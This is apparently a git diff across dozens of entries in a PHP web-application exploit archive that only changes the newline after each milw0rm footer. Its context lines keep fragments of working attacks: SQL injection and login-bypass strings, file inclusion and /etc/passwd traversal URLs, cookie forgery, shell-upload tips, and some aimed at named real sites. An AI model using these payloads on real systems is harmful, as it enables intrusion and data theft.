INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL ALL www.SnakespC.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8602.txt b/platforms/php/webapps/8602.txt index 5ff028306..e3733ad5e 100755 --- a/platforms/php/webapps/8602.txt +++ b/platforms/php/webapps/8602.txt @@ -23,4 +23,4 @@ path/bin/qte_init.php?qte_root=shell.txt? dork: :d -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-= -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8603.php b/platforms/php/webapps/8603.php index 2d86ef856..a572eb7ce 100755 --- a/platforms/php/webapps/8603.php +++ b/platforms/php/webapps/8603.php @@ -167,4 +167,4 @@ while(1) ?> -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8604.txt b/platforms/php/webapps/8604.txt index 42a790df1..e606a14e5 100755 --- a/platforms/php/webapps/8604.txt +++ b/platforms/php/webapps/8604.txt @@ -37,4 +37,4 @@ SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu ALL My Friends (Dz) [+]-------------------------------------[+] -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8605.txt b/platforms/php/webapps/8605.txt index 35bf6ba84..bd55ff4c0 100755 --- a/platforms/php/webapps/8605.txt +++ b/platforms/php/webapps/8605.txt @@ -24,4 +24,4 @@ http://www.kalptarudemos.com/demo/million/admin.php Greeting To ALL My Friends (Dz) ---------------------------------------------------------------- -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8608.txt b/platforms/php/webapps/8608.txt index bd293167c..01b84917b 100755 --- a/platforms/php/webapps/8608.txt +++ b/platforms/php/webapps/8608.txt @@ -125,4 +125,4 @@ http://[HOST]/[HOME_PATH]/addons/imagelibrary/select_image.php?dir=../ ####################################################################### ####################################################################### -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8609.pl b/platforms/php/webapps/8609.pl index bf5c0eab2..47595a4ec 100755 --- a/platforms/php/webapps/8609.pl +++ b/platforms/php/webapps/8609.pl @@ -48,4 +48,4 @@ help(); exit; } -# milw0rm.com [2009-05-04] +# milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/platforms/php/webapps/8615.txt b/platforms/php/webapps/8615.txt index 9ca9fde61..831fdef95 100755 --- a/platforms/php/webapps/8615.txt +++ b/platforms/php/webapps/8615.txt @@ -162,4 +162,4 @@ http://[HOST]/[HOME_PATH]/sobre.php?m=10"> # Admin's file upload script without extension checking Upload your shell at /admin/manage_uploads.php. Then use it at /uploads/shell.php -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8839.txt b/platforms/php/webapps/8839.txt index 50446b0d3..59fb778d1 100755 --- a/platforms/php/webapps/8839.txt +++ b/platforms/php/webapps/8839.txt @@ -19,4 +19,4 @@ http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+sel Gretz : C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8840.txt b/platforms/php/webapps/8840.txt index c9dafc7d4..79338a059 100755 --- a/platforms/php/webapps/8840.txt +++ b/platforms/php/webapps/8840.txt @@ -43,4 +43,4 @@ C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses, Site Referer : http://foro.undersecurity.net/read.php?16,1971,1971#msg-1971 -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8841.txt b/platforms/php/webapps/8841.txt index 98d34db36..47a055327 100755 --- a/platforms/php/webapps/8841.txt +++ b/platforms/php/webapps/8841.txt @@ -410,4 +410,4 @@ sub banner() print "[+] Coded by girex\n\n"; } -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8843.pl b/platforms/php/webapps/8843.pl index 65a71c86e..74debf114 100755 --- a/platforms/php/webapps/8843.pl +++ b/platforms/php/webapps/8843.pl @@ -221,4 +221,4 @@ if($output!~(/\ERROR\<\/strong\>/)) exit(1); #Ok...all job done -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8844.txt b/platforms/php/webapps/8844.txt index 1f3c86c8e..454137a7d 100755 --- a/platforms/php/webapps/8844.txt +++ b/platforms/php/webapps/8844.txt @@ -118,4 +118,4 @@ EXPLOITS: ############################################################################## ############################################################################## -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8847.txt b/platforms/php/webapps/8847.txt index 4a45c4237..0cbf824be 100755 --- a/platforms/php/webapps/8847.txt +++ b/platforms/php/webapps/8847.txt @@ -78,4 +78,4 @@ http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id= 2.0.4 Registration Manager -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8848.txt b/platforms/php/webapps/8848.txt index e7a8ab31a..9eae80f5e 100755 --- a/platforms/php/webapps/8848.txt +++ b/platforms/php/webapps/8848.txt @@ -48,4 +48,4 @@ TO str0ke @~~===============INDIAN=================~~@ -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8850.txt b/platforms/php/webapps/8850.txt index 0fcc9e232..b67e9a4a5 100755 --- a/platforms/php/webapps/8850.txt +++ b/platforms/php/webapps/8850.txt @@ -28,4 +28,4 @@ And booooooooooom The backup is reading :) Greeting To ALL My Friends (Dz) ---------------------------------------------------------------- -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8851.txt b/platforms/php/webapps/8851.txt index 8b037c5f3..fbaf021ad 100755 --- a/platforms/php/webapps/8851.txt +++ b/platforms/php/webapps/8851.txt @@ -27,4 +27,4 @@ =- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8852.txt b/platforms/php/webapps/8852.txt index 1153598e8..6417b7ec8 100755 --- a/platforms/php/webapps/8852.txt +++ b/platforms/php/webapps/8852.txt @@ -54,4 +54,4 @@ my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); if ($request->is_success) {print "[+] $site Kaydedildi! Git= c:/db.mdb";exit();} else {print "[!] Exploit $site Failed !\n[!] ".$request->status_line."\n";exit();} -# milw0rm.com [2009-06-01] +# milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/php/webapps/8853.txt b/platforms/php/webapps/8853.txt index 34b89acd8..a86c43e79 100755 --- a/platforms/php/webapps/8853.txt +++ b/platforms/php/webapps/8853.txt @@ -110,4 +110,4 @@ LFI/BSQLi --> http://www.youtube.com/watch?v=6kt-NU98GXU ############################################################################## ############################################################################## -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8854.pl b/platforms/php/webapps/8854.pl index 6ee021866..3006b7cde 100755 --- a/platforms/php/webapps/8854.pl +++ b/platforms/php/webapps/8854.pl @@ -286,4 +286,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8855.txt b/platforms/php/webapps/8855.txt index 442d7fc5e..6614b9efa 100755 --- a/platforms/php/webapps/8855.txt +++ b/platforms/php/webapps/8855.txt @@ -61,4 +61,4 @@ http://www.blizsoft.com/article/images/author_pics/41.php [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8856.txt b/platforms/php/webapps/8856.txt index 6d411a432..6ca643d5d 100755 --- a/platforms/php/webapps/8856.txt +++ b/platforms/php/webapps/8856.txt @@ -46,4 +46,4 @@ Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8857.txt b/platforms/php/webapps/8857.txt index 3638e55f9..08b5dcbff 100755 --- a/platforms/php/webapps/8857.txt +++ b/platforms/php/webapps/8857.txt @@ -26,4 +26,4 @@ http://[website]/[script]/webCal3_detail.asp?event_id=20814+union+select+1,2,3,4 [peace xD] -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8858.txt b/platforms/php/webapps/8858.txt index 6ce1a79c7..6e9fb2339 100755 --- a/platforms/php/webapps/8858.txt +++ b/platforms/php/webapps/8858.txt @@ -24,4 +24,4 @@ Login as : ######################################################################### -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8860.txt b/platforms/php/webapps/8860.txt index d3bf3049e..f37487e28 100755 --- a/platforms/php/webapps/8860.txt +++ b/platforms/php/webapps/8860.txt @@ -50,4 +50,4 @@ +-----------------------------------------------+ -# milw0rm.com [2009-06-02] +# milw0rm.com [2009-06-02] \ No newline at end of file diff --git a/platforms/php/webapps/8864.txt b/platforms/php/webapps/8864.txt index 667ac08a4..9b070dd5f 100755 --- a/platforms/php/webapps/8864.txt +++ b/platforms/php/webapps/8864.txt @@ -21,4 +21,4 @@ http://cupidsystems.com/products/myminibill/demo/ Note: ALgerie en Coupe Du Monde In shaa ALLAH* ################################################################################################ -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8865.txt b/platforms/php/webapps/8865.txt index a474a68ae..2ed4d8bb0 100755 --- a/platforms/php/webapps/8865.txt +++ b/platforms/php/webapps/8865.txt @@ -86,4 +86,4 @@ if($AdminInfo==1) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=- Salam to All Muslim Hackers. -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8866.php b/platforms/php/webapps/8866.php index 87bde711b..a3e004fa3 100755 --- a/platforms/php/webapps/8866.php +++ b/platforms/php/webapps/8866.php @@ -173,4 +173,4 @@ function start_usage() die(); } -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8867.pl b/platforms/php/webapps/8867.pl index 205864b84..04aaeee85 100755 --- a/platforms/php/webapps/8867.pl +++ b/platforms/php/webapps/8867.pl @@ -89,4 +89,4 @@ sub istrue2 } } -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8868.txt b/platforms/php/webapps/8868.txt index 3eb8c398f..fdad3723c 100755 --- a/platforms/php/webapps/8868.txt +++ b/platforms/php/webapps/8868.txt @@ -51,4 +51,4 @@ files from the hosting system due to inadequate file handling in cvs.php. http://example.org/ocsreports/cvs.php?log=/etc/passwd -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8869.txt b/platforms/php/webapps/8869.txt index 1d0622f97..03a50d891 100755 --- a/platforms/php/webapps/8869.txt +++ b/platforms/php/webapps/8869.txt @@ -20,4 +20,4 @@ http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,u gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8870.txt b/platforms/php/webapps/8870.txt index 5ea74a6a8..291d062c1 100755 --- a/platforms/php/webapps/8870.txt +++ b/platforms/php/webapps/8870.txt @@ -45,4 +45,4 @@ @~~=:/ -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8871.txt b/platforms/php/webapps/8871.txt index 7af59dc66..8211b5893 100755 --- a/platforms/php/webapps/8871.txt +++ b/platforms/php/webapps/8871.txt @@ -26,4 +26,4 @@ Line 84 : @eval(stripslashes($_REQUEST['anticode'])); ################################################################################################################# -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8872.txt b/platforms/php/webapps/8872.txt index 73ac9196a..843f2009d 100755 --- a/platforms/php/webapps/8872.txt +++ b/platforms/php/webapps/8872.txt @@ -63,4 +63,4 @@ http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion®ID=4%27+ 1.0f Mambo Resident component for v4.5.2 -# milw0rm.com [2009-06-03] +# milw0rm.com [2009-06-03] \ No newline at end of file diff --git a/platforms/php/webapps/8874.txt b/platforms/php/webapps/8874.txt index ecb5a81b7..54ff59ec5 100755 --- a/platforms/php/webapps/8874.txt +++ b/platforms/php/webapps/8874.txt @@ -37,4 +37,4 @@ SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit Greeting To ALL My Friends (Dz) ------------------------------------------ -# milw0rm.com [2009-06-04] +# milw0rm.com [2009-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/8876.htm b/platforms/php/webapps/8876.htm index 1a39534c0..34fd7d1ab 100755 --- a/platforms/php/webapps/8876.htm +++ b/platforms/php/webapps/8876.htm @@ -26,4 +26,4 @@ -# milw0rm.com [2009-06-04] +# milw0rm.com [2009-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/8877.txt b/platforms/php/webapps/8877.txt index 9253dca5f..593340386 100755 --- a/platforms/php/webapps/8877.txt +++ b/platforms/php/webapps/8877.txt @@ -37,4 +37,4 @@ http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-06-04] +# milw0rm.com [2009-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/8878.txt b/platforms/php/webapps/8878.txt index 373120592..e06cda338 100755 --- a/platforms/php/webapps/8878.txt +++ b/platforms/php/webapps/8878.txt @@ -33,4 +33,4 @@ booooooooooooommmmmmmmmm the Backup is download :) Greeting To ALL My Friends (Dz) ----------------------------------------- -# milw0rm.com [2009-06-04] +# milw0rm.com [2009-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/8879.htm b/platforms/php/webapps/8879.htm index b428a20f3..1cbc3eaef 100755 --- a/platforms/php/webapps/8879.htm +++ b/platforms/php/webapps/8879.htm @@ -141,4 +141,4 @@ Home:http://www.phphostdirectoryscript.com/

-# milw0rm.com [2009-06-04] +# milw0rm.com [2009-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/8882.txt b/platforms/php/webapps/8882.txt index dc6177eed..a17588d70 100755 --- a/platforms/php/webapps/8882.txt +++ b/platforms/php/webapps/8882.txt @@ -20,4 +20,4 @@ Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4::: ALL www.Snakespc.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-06-05] +# milw0rm.com [2009-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/8883.txt b/platforms/php/webapps/8883.txt index 23e5eafb0..499113b56 100755 --- a/platforms/php/webapps/8883.txt +++ b/platforms/php/webapps/8883.txt @@ -18,4 +18,4 @@ Username: admin' or '1=1 Password: ThE g0bL!N Note: ALgerie en Coupe Du Monde In shaa ALLAH -# milw0rm.com [2009-06-05] +# milw0rm.com [2009-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/8884.txt b/platforms/php/webapps/8884.txt index 866e69b7b..654e9f54e 100755 --- a/platforms/php/webapps/8884.txt +++ b/platforms/php/webapps/8884.txt @@ -95,4 +95,4 @@ SQL INJECTION (SQLi): ############################################################################## ############################################################################## -# milw0rm.com [2009-06-05] +# milw0rm.com [2009-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/8885.pl b/platforms/php/webapps/8885.pl index 29cbd8e89..0c5db556b 100755 --- a/platforms/php/webapps/8885.pl +++ b/platforms/php/webapps/8885.pl @@ -251,4 +251,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-06-05] +# milw0rm.com [2009-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/8886.txt b/platforms/php/webapps/8886.txt index 4babcfc96..cd87dc0aa 100755 --- a/platforms/php/webapps/8886.txt +++ b/platforms/php/webapps/8886.txt @@ -24,4 +24,4 @@ #--------------------------SNAKES TEAM------------------------------ #ALL www.SnakespC.com/sc>>>> ( Members ) >>>>Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/889.pl b/platforms/php/webapps/889.pl index df5a985dc..a65d5a514 100755 --- a/platforms/php/webapps/889.pl +++ b/platforms/php/webapps/889.pl @@ -91,4 +91,4 @@ die "Error: ", $response->status_line unless $response->is_success; print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++"; -# milw0rm.com [2005-03-21] +# milw0rm.com [2005-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/8891.txt b/platforms/php/webapps/8891.txt index b9775bade..b5bb6249e 100755 --- a/platforms/php/webapps/8891.txt +++ b/platforms/php/webapps/8891.txt @@ -38,4 +38,4 @@ This component in released under the GNU/GPL License www.joomla.cl 1.4 -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8892.txt b/platforms/php/webapps/8892.txt index e9e2f2532..93f099b38 100755 --- a/platforms/php/webapps/8892.txt +++ b/platforms/php/webapps/8892.txt @@ -20,4 +20,4 @@ WWW.UNDERSECURITY.NET ################################################################################################################################################## -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8893.txt b/platforms/php/webapps/8893.txt index 1ec5682ae..21734fd4f 100755 --- a/platforms/php/webapps/8893.txt +++ b/platforms/php/webapps/8893.txt @@ -30,4 +30,4 @@ C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses, 100% CHILE WWW.UNDERSECURITY.NET -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8894.txt b/platforms/php/webapps/8894.txt index 80e129d7f..a63dc7563 100755 --- a/platforms/php/webapps/8894.txt +++ b/platforms/php/webapps/8894.txt @@ -30,4 +30,4 @@ C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses, 100% CHILE WWW.UNDERSECURITY.NET -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8898.txt b/platforms/php/webapps/8898.txt index f181fbacb..e5d6e90ae 100755 --- a/platforms/php/webapps/8898.txt +++ b/platforms/php/webapps/8898.txt @@ -38,4 +38,4 @@ http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&f http://opensource.focalizaisso.com.br/ http://opensource.focalizaisso.com.br/ -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8900.txt b/platforms/php/webapps/8900.txt index a3f99f346..0c9486be5 100755 --- a/platforms/php/webapps/8900.txt +++ b/platforms/php/webapps/8900.txt @@ -26,4 +26,4 @@ #--------------------------SNAKES TEAM------------------------------ #ALL www.SnakespC.com/sc>>>> ( Members ) >>>>Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8901.txt b/platforms/php/webapps/8901.txt index f1a91ee5b..f1adfd2c8 100755 --- a/platforms/php/webapps/8901.txt +++ b/platforms/php/webapps/8901.txt @@ -27,4 +27,4 @@ El akouba pour le retour #--------------------------SNAKES TEAM------------------------------ #ALL www.SnakespC.com/sc>>>> ( Members ) >>>>Str0ke >>>>>>>Milw0rm -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8902.htm b/platforms/php/webapps/8902.htm index e1dd860ec..1fec7335e 100755 --- a/platforms/php/webapps/8902.htm +++ b/platforms/php/webapps/8902.htm @@ -16,4 +16,4 @@ code --------------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8903.txt b/platforms/php/webapps/8903.txt index 61690ed40..da5962674 100755 --- a/platforms/php/webapps/8903.txt +++ b/platforms/php/webapps/8903.txt @@ -25,4 +25,4 @@ javascript:document.cookie="USERID=51;path=/products/dm-filemanager/demo/admin/" Note: ALgerie en Coupe Du Monde In shaa ALLAH ################################################################################################ -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8904.txt b/platforms/php/webapps/8904.txt index bf9003b54..645e72298 100755 --- a/platforms/php/webapps/8904.txt +++ b/platforms/php/webapps/8904.txt @@ -70,4 +70,4 @@ http://www.linkspile.com/ Greeting To ALL My Friends (Dz) ----------------------------------------------------------------- -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8905.txt b/platforms/php/webapps/8905.txt index 6229124dd..574717d7d 100755 --- a/platforms/php/webapps/8905.txt +++ b/platforms/php/webapps/8905.txt @@ -30,4 +30,4 @@ http://www.garboweb.com/index.php?option=com_portafolio&task=viewcat&cid=-null+a [!] Produced in South America ------------------------------------ -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8906.pl b/platforms/php/webapps/8906.pl index 80ccdb859..a4774e4c0 100755 --- a/platforms/php/webapps/8906.pl +++ b/platforms/php/webapps/8906.pl @@ -160,4 +160,4 @@ sub Banner { "; } -# milw0rm.com [2009-06-08] +# milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/8908.txt b/platforms/php/webapps/8908.txt index 9022aed12..415a84c6b 100755 --- a/platforms/php/webapps/8908.txt +++ b/platforms/php/webapps/8908.txt @@ -21,4 +21,4 @@ Thanx: str0ke, VoLkan =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8911.txt b/platforms/php/webapps/8911.txt index a630e7262..f811c2cf6 100755 --- a/platforms/php/webapps/8911.txt +++ b/platforms/php/webapps/8911.txt @@ -28,4 +28,4 @@ Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :) http://saddo.ru/ SE 2.3 -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8912.txt b/platforms/php/webapps/8912.txt index 953bfafb0..2d8afe03f 100755 --- a/platforms/php/webapps/8912.txt +++ b/platforms/php/webapps/8912.txt @@ -21,4 +21,4 @@ Thanx: str0ke, VoLkan =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8913.txt b/platforms/php/webapps/8913.txt index 82dff6792..0c40961ec 100755 --- a/platforms/php/webapps/8913.txt +++ b/platforms/php/webapps/8913.txt @@ -113,4 +113,4 @@ Note: Of course use null byte (%00) when you want to include a file with differe ############################################################################## ############################################################################## -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8914.txt b/platforms/php/webapps/8914.txt index 48a7f0065..686857e83 100755 --- a/platforms/php/webapps/8914.txt +++ b/platforms/php/webapps/8914.txt @@ -174,4 +174,4 @@ Set username. ############################################################################## ############################################################################## -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8915.pl b/platforms/php/webapps/8915.pl index c81a47ef2..ca582fb86 100755 --- a/platforms/php/webapps/8915.pl +++ b/platforms/php/webapps/8915.pl @@ -275,4 +275,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8917.txt b/platforms/php/webapps/8917.txt index fa628f049..06d1abeac 100755 --- a/platforms/php/webapps/8917.txt +++ b/platforms/php/webapps/8917.txt @@ -25,4 +25,4 @@ Admin Change Password: *-------------------- http://victim.com/path/admin.php?action=editop&id=1 -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8918.txt b/platforms/php/webapps/8918.txt index 46a24b6e1..b7a9ad90b 100755 --- a/platforms/php/webapps/8918.txt +++ b/platforms/php/webapps/8918.txt @@ -16,4 +16,4 @@ Demo: ---- http://www.myhotlinks.net/hlphpsql/report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3-- -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8919.txt b/platforms/php/webapps/8919.txt index caa1200f4..27bf249f5 100755 --- a/platforms/php/webapps/8919.txt +++ b/platforms/php/webapps/8919.txt @@ -21,4 +21,4 @@ Thanx: str0ke, VoLkan =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/892.txt b/platforms/php/webapps/892.txt index 332f972f7..b508a7732 100755 --- a/platforms/php/webapps/892.txt +++ b/platforms/php/webapps/892.txt @@ -5,4 +5,4 @@ Login as admin without pass: Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes) Password: (empty) -# milw0rm.com [2005-03-21] +# milw0rm.com [2005-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/8920.txt b/platforms/php/webapps/8920.txt index bc42a070e..f7df28fad 100755 --- a/platforms/php/webapps/8920.txt +++ b/platforms/php/webapps/8920.txt @@ -21,4 +21,4 @@ Thanx: str0ke, VoLkan =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8921.sh b/platforms/php/webapps/8921.sh index 8ae2342bd..cba2699bf 100755 --- a/platforms/php/webapps/8921.sh +++ b/platforms/php/webapps/8921.sh @@ -105,4 +105,4 @@ else exit fi -# milw0rm.com [2009-06-09] +# milw0rm.com [2009-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/8923.txt b/platforms/php/webapps/8923.txt index f4f89989e..7bf0d7fbd 100755 --- a/platforms/php/webapps/8923.txt +++ b/platforms/php/webapps/8923.txt @@ -115,4 +115,4 @@ sub usage() exit; } -# milw0rm.com [2009-06-10] +# milw0rm.com [2009-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/8924.txt b/platforms/php/webapps/8924.txt index 8b31370ec..bcbf44125 100755 --- a/platforms/php/webapps/8924.txt +++ b/platforms/php/webapps/8924.txt @@ -35,4 +35,4 @@ ---------------------------------------------------------------------------------------------------- -# milw0rm.com [2009-06-10] +# milw0rm.com [2009-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/8925.txt b/platforms/php/webapps/8925.txt index 8ca25e428..d5134a02b 100755 --- a/platforms/php/webapps/8925.txt +++ b/platforms/php/webapps/8925.txt @@ -12,4 +12,4 @@ javascript:document.cookie = "uid = 13"; ----------------- demo:http://www.desiscripts.com/demo/URL/index.php -# milw0rm.com [2009-06-10] +# milw0rm.com [2009-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/8926.txt b/platforms/php/webapps/8926.txt index 4cace287c..cb56115c6 100755 --- a/platforms/php/webapps/8926.txt +++ b/platforms/php/webapps/8926.txt @@ -34,4 +34,4 @@ if (($checkid == $adminuser) && ($checkpass == $adminpass)) {$opid = $adminuser; ---- http://www.mrcgiguy.com/freeticket/admin.php -# milw0rm.com [2009-06-10] +# milw0rm.com [2009-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/8927.pl b/platforms/php/webapps/8927.pl index 0e1df111b..ea5d8281a 100755 --- a/platforms/php/webapps/8927.pl +++ b/platforms/php/webapps/8927.pl @@ -245,4 +245,4 @@ print "\t\t<<------------------------EOF---------------------->>\n\n"; exit(1); #Ok...all job done -# milw0rm.com [2009-06-10] +# milw0rm.com [2009-06-10] \ No newline at end of file diff --git a/platforms/php/webapps/8928.txt 